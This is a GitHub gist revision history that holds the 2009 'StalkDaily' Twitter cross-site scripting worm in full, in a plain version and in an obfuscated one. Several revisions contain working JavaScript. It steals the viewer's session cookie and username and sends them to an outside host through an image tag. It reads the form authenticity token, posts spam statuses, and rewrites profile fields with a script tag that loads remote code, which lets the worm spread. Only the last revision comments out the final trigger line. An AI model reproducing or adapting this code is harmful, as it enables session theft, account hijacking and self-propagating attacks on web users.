Skip to content

Instantly share code, notes, and snippets.

@voxpelli

voxpelli/stalkdaily_worm.js

Forked from imajes/current 'stalkdaily' xss attack
Created April 13, 2009 10:22
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save voxpelli/94388 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save voxpelli/94388 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. voxpelli renamed this gist Apr 13, 2009. 1 changed file with 2 additions and 1 deletion.
    3 changes: 2 additions & 1 deletion current 'stalkdaily' xss attack → stalkdaily_worm.js
    View file
    Original file line number Diff line number Diff line change
    @@ -168,4 +168,5 @@ function wait() {
    var xmlhttp2 = new XHConn();
    xmlhttp2[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[protected] = 0 & commit = Save ");
    };
    setTimeout(_strings[0x3c], 3550);
    //Commented out as to not be another host of a working script
    //setTimeout(_strings[0x3c], 3550);
  2. voxpelli revised this gist Apr 13, 2009. 1 changed file with 0 additions and 0 deletions.
    Empty file removed gistfile2.txt
    View file
    Empty file.
  3. voxpelli revised this gist Apr 13, 2009. 2 changed files with 160 additions and 102 deletions.
    262 changes: 160 additions & 102 deletions current 'stalkdaily' xss attack
    View file
    Original file line number Diff line number Diff line change
    @@ -1,113 +1,171 @@
    function XHConn()
    {
    var xmlhttp, bComplete = false;
    try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
    catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch (e) { try { xmlhttp = new XMLHttpRequest(); }
    catch (e) { xmlhttp = false; }}}
    if (!xmlhttp) return null;
    this.connect = function(sURL, sMethod, sVars, fnDone)
    {
    if (!xmlhttp) return false;
    var _strings = [
    "Msxml2.XMLHTTP", //0 0x0
    "Microsoft.XMLHTTP",
    "connect",
    "toUpperCase",
    "GET",
    "?", //5 0x5
    "open",
    "",
    "Method",
    "POST ",
    " HTTP/1.1", //10 0xa
    "setRequestHeader",
    "Content-Type",
    "application/x-www-form-urlencoded; charset=UTF-8",
    "onreadystatechange",
    "readyState", //15 0xf
    "send",
    "split",
    "join",
    "'",
    "%27", //20 0x14
    "(",
    "%28",
    ")",
    "%29",
    "*", //25 0x19
    "%2A",
    "~",
    "%7E",
    "!",
    "%21", //30 0x1e (?)
    "%20",
    "+",
    "%",
    "replace",
    "innerHTML", //35 0x23
    "documentElement",
    "exec",
    "<img src='http://www.stalkdaily.com/x.php?username=",
    "'>",
    "write", //40 0x28
    "Twitter, hire Mikeyy! (718) 312-8131 :)",
    "random", //42 0x2a
    "length", //43 0x2b
    "floor", //44 0x2c
    "\" > <title > <script > document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 115, 116, 97, 108, 107, 100, 97, 105, 108, 121, 46, 99, 111, 109, 47, 97, 106, 97, 120, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62)); < /script>",
    "/status / update ", //46 0x2e
    "POST ",
    "authenticity_token = ",
    " & status = ",
    " & return_rendered_status = true & twttr = true ",
    " / account / settings ",
    " & user[name] = ", //52 0x34
    " & user[protected] = 0 & commit = Save ",
    " / account / profile_settings ",
    " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = ",
    "##Mikeyy ",
    " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&commit = save changes ",
    " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected] = 0 & commit = Save ",
    " & commit = save changes ",
    "wait()" //60 0x3c
    ];
    function XHConn() {
    var xmlhttp,
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
    if (sMethod == "GET")
    {
    xmlhttp.open(sMethod, sURL+"?"+sVars, true);
    sVars = "";
    }
    else
    {
    xmlhttp.open(sMethod, sURL, true);
    xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
    xmlhttp.setRequestHeader("Content-Type",
    "application/x-www-form-urlencoded");
    }
    xmlhttp.onreadystatechange = function(){
    if (xmlhttp.readyState == 4 && !bComplete)
    {
    bComplete = true;
    fnDone(xmlhttp);
    }};
    xmlhttp.send(sVars);
    }
    catch(z) { return false; }
    return true;
    };
    return this;
    }

    function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    xmlhttp = new ActiveXObject(_strings[0x0]);
    } catch(e) {
    try {
    xmlhttp = new ActiveXObject(_strings[0x1]);
    } catch(e) {
    try {
    xmlhttp = new XMLHttpRequest();
    } catch(e) {
    xmlhttp = false;
    };
    };
    };
    if (!xmlhttp) {
    return null;
    };
    this[_strings[0x2]] = function(sURL, sMethod, sVars, fnDone) {
    if (!xmlhttp) {
    return false;
    };
    bComplete = false;
    sMethod = sMethod[_strings[0x3]]();
    try {
    if (sMethod == _strings[0x4]) {
    xmlhttp[_strings[0x6]](sMethod, sURL + _strings[0x5] + sVars, true);
    sVars = _strings[0x7];
    } else {
    xmlhttp[_strings[0x6]](sMethod, sURL, true);
    xmlhttp[_strings[0xb]](_strings[0x8], _strings[0x9] + sURL + _strings[0xa]);
    xmlhttp[_strings[0xb]](_strings[0xc], _strings[0xd]);
    };
    xmlhttp[_strings[0xe]] = function() {
    if (xmlhttp[_strings[0xf]] == 0x4 && !bComplete) {
    bComplete = true;
    if (fnDone != null) {
    fnDone(xmlhttp);
    };
    };
    };
    xmlhttp[_strings[0x10]](sVars);
    } catch(z) {
    return false;
    };
    return true;
    };
    return this;
    };
    function urlencode(str) {
    var histogram = {},
    tmp_arr = [];
    var ret = str.toString();

    var replacer = function(search, replace, str) {
    var tmp_arr = [];
    tmp_arr = str.split(search);
    return tmp_arr.join(replace);
    tmp_arr = str[_strings[0x11]](search);
    return tmp_arr[_strings[0x12]](replace);
    };

    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';

    histogram[_strings[0x13]] = _strings[0x14];
    histogram[_strings[0x15]] = _strings[0x16];
    histogram[_strings[0x17]] = _strings[0x18];
    histogram[_strings[0x19]] = _strings[0x1a];
    histogram[_strings[0x1b]] = _strings[0x1c];
    histogram[_strings[0x1d]] = _strings[0x1e];
    histogram[_strings[0x1f]] = _strings[0x20];
    ret = encodeURIComponent(ret);

    for (search in histogram) {
    replace = histogram[search];
    ret = replacer(search, replace, ret)
    }

    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
    return "%"+m2.toUpperCase();
    ret = replacer(search, replace, ret);
    };
    return ret[_strings[0x22]](/(\%([a-z0-9]{2}))/g,
    function(full, m1, m2) {
    return _strings[0x21] + m2[_strings[0x3]]();
    });

    return ret;
    }

    var content = document.documentElement.innerHTML;
    userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
    var username = userreg.exec(content);
    username = username[1];

    var cookie;
    cookie = urlencode(document.cookie);
    document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
    document.write("<img src='http://stalkdaily.com/log.gif'>");

    function wait()
    {
    var content = document.documentElement.innerHTML;

    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg.exec(content);
    authtoken = authtoken[1];
    //alert(authtoken);

    var randomUpdate=new Array();
    randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
    randomUpdate[1]="Join www.StalkDaily.com everyone!";
    randomUpdate[2]="Woooo, www.StalkDaily.com :)";
    randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
    randomUpdate[4]="Wow...www.StalkDaily.com";
    randomUpdate[5]="@twitter www.StalkDaily.com";

    var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];

    updateEncode = urlencode(genRand);

    var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

    var ajaxConn = new XHConn();
    ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
    var ajaxConn1 = new XHConn();
    ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
    }
    setTimeout("wait()",3250);


    };
    function wait() {
    var content = document[_strings[0x24]][_strings[0x23]];
    userreg = new RegExp(/<meta content=" (. * )" name="session - user - screen_name "/g);
    var username = userreg[_strings[0x25]](content);
    username = username[0x1];
    document[_strings[0x28]](_strings[0x26] + username + _strings[0x27]);
    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg[_strings[0x25]](content);
    authtoken = authtoken[0x1];
    var randomUpdate = new Array();
    randomUpdate[0x0] = _strings[0x29];
    var genRand = randomUpdate[Math[_strings[0x2c]](Math[_strings[0x2a]]() * randomUpdate[_strings[0x2b]])];
    var updateEncode = urlencode(genRand);
    var newSettings = new Array();
    newSettings[0x0] = _strings[0x2d]; //This fetches the string that is going to be inserted as a new name
    var newName = newSettings[Math[_strings[0x2c]](Math[_strings[0x2a]]() * newSettings[_strings[0x2b]])]; //newSettings[Math.floor(Math.random() * newSettings.length)];
    var newNameEncode = urlencode(newName);
    var _0x1b68x1d = new XHConn();
    _0x1b68x1d[_strings[0x2]]("/status / update ", "POST ", "authenticity_token = " + authtoken + " & status = " + updateEncode + " & return_rendered_status = true & twttr = true ");
    var _0x1b68x1e = new XHConn();
    _0x1b68x1e[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[protected] = 0 & commit = Save ");
    var _0x1b68x1f = new XHConn();
    _0x1b68x1f[_strings[0x2]](" / account / profile_settings ", "POST ", "authenticity_token = " + authtoken + " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = " + urlencode("##Mikeyy ") + " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&commit = save changes ");
    var xmlhttp0 = new XHConn();
    xmlhttp0[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[url] = Mikeyy+++++++++++++++++++++++++++++++++++++&user[protected] = 0 & commit = Save ");
    var xmlhttp1 = new XHConn();
    xmlhttp1[_strings[0x2]](" / account / profile_settings ", "POST ", "authenticity_token = " + authtoken + " & user[profile_default] = false & tab = colors & profile_theme = 1 & user[profile_background_color] = " + urlencode("##Mikeyy ") + " & user[name] = " + newNameEncode + " & commit = save changes ");
    var xmlhttp2 = new XHConn();
    xmlhttp2[_strings[0x2]](" / account / settings ", "POST ", "authenticity_token = " + authtoken + " & user[name] = " + newNameEncode + " & user[protected] = 0 & commit = Save ");
    };
    setTimeout(_strings[0x3c], 3550);
    Empty file added gistfile2.txt
    View file
    Empty file.
  4. @imajes imajes created this gist Apr 11, 2009.
    113 changes: 113 additions & 0 deletions current 'stalkdaily' xss attack
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,113 @@
    function XHConn()
    {
    var xmlhttp, bComplete = false;
    try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
    catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
    catch (e) { try { xmlhttp = new XMLHttpRequest(); }
    catch (e) { xmlhttp = false; }}}
    if (!xmlhttp) return null;
    this.connect = function(sURL, sMethod, sVars, fnDone)
    {
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
    if (sMethod == "GET")
    {
    xmlhttp.open(sMethod, sURL+"?"+sVars, true);
    sVars = "";
    }
    else
    {
    xmlhttp.open(sMethod, sURL, true);
    xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
    xmlhttp.setRequestHeader("Content-Type",
    "application/x-www-form-urlencoded");
    }
    xmlhttp.onreadystatechange = function(){
    if (xmlhttp.readyState == 4 && !bComplete)
    {
    bComplete = true;
    fnDone(xmlhttp);
    }};
    xmlhttp.send(sVars);
    }
    catch(z) { return false; }
    return true;
    };
    return this;
    }

    function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();

    var replacer = function(search, replace, str) {
    var tmp_arr = [];
    tmp_arr = str.split(search);
    return tmp_arr.join(replace);
    };

    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';

    ret = encodeURIComponent(ret);

    for (search in histogram) {
    replace = histogram[search];
    ret = replacer(search, replace, ret)
    }

    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
    return "%"+m2.toUpperCase();
    });

    return ret;
    }

    var content = document.documentElement.innerHTML;
    userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
    var username = userreg.exec(content);
    username = username[1];

    var cookie;
    cookie = urlencode(document.cookie);
    document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
    document.write("<img src='http://stalkdaily.com/log.gif'>");

    function wait()
    {
    var content = document.documentElement.innerHTML;

    authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
    var authtoken = authreg.exec(content);
    authtoken = authtoken[1];
    //alert(authtoken);

    var randomUpdate=new Array();
    randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
    randomUpdate[1]="Join www.StalkDaily.com everyone!";
    randomUpdate[2]="Woooo, www.StalkDaily.com :)";
    randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
    randomUpdate[4]="Wow...www.StalkDaily.com";
    randomUpdate[5]="@twitter www.StalkDaily.com";

    var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];

    updateEncode = urlencode(genRand);

    var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

    var ajaxConn = new XHConn();
    ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
    var ajaxConn1 = new XHConn();
    ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
    }
    setTimeout("wait()",3250);